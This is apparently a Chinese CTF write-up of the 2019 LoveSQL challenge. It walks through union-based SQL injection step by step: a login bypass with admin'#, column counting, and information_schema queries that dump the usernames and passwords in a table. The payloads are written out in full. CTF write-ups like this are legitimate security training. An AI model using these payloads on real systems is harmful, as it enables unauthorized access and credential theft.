[极客大挑战 2019]LoveSQL 1
很明显这时一道SQL注入的题目
这题很简单的SQL注入题目,使用union(联合查询注入),但是缠了我很久
为什么呢?因为我们学校的waf,很多可以注入成功的语句,他都会连接被重置,或者被burpsutie拦截,吃玩饭回来,我觉得不对劲,连接得我手机的热点,原来这个题目如此简单。
进入页面
数据'引号尝试闭合SQL语句
可以看到,这里只需要输入'#就可以闭合成功
admin'#
可以看到绕过成功
判断字段数
拥有三个字段,使用-1' union select 1,2,3 #查询
后面都是经典步骤
union select 1,user(),database() #
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
得到当前数据库下的表名为
geekuser,l0ve1ysq1
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'#
得到字段名为id、username、password
union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
得到flag
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 震惊!C++程序真的从main开始吗?99%的程序员都答错了
· 【硬核科普】Trae如何「偷看」你的代码?零基础破解AI编程运行原理
· 单元测试从入门到精通
· 上周热点回顾(3.3-3.9)
· Vue3状态管理终极指南:Pinia保姆级教程